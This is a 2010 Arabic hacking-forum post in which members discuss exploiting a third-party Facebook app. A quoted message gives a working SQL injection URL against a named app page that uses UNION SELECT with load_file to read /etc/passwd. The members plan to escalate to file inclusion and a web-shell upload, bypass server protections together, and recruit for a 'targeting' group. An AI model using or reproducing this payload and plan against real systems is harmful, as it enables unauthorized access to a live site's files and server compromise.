عرض مشاركة واحدة
قديم 08-27-2010, 01:02 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
kanvi
 
الصورة الرمزية kanvi
 

 

 
إحصائية العضو





kanvi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kanvi is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.NaNo
اهلين اخي نورت الموضوع ..


بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات

لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d


وانا جبت الروابط عشان نطورها فقط لا غير ..


والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:

كود PHP:
   http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 
لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر

ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين



بالتوفيــق

بارك الله فيك اخي العزيز

نعم الثغرة مشروحة في مواقع السكريتي وهي ثغرة في تطبيقات app.facebook
وليست ثغرة facebook

يعني اذا رفعة الشل ستجده في موقع اخر وليس على
الفيس بوك

في انتظر التطوير الثغرةفلسطين
في امان الله
التوقيع

...|""""""""""""""""""""""""""""|\|_
...|<<< k4nvi
>>>|||"|""\___-
...| ________________ __ _|||_|____|)


...!(@)'(@)""""******!(@)(@)*****!(@)""

انا حابب اشترك باحد الجروبات الخاصة بغرفة الاستهداف
Email:
__0@hotmail.sg

 

   

رد مع اقتباس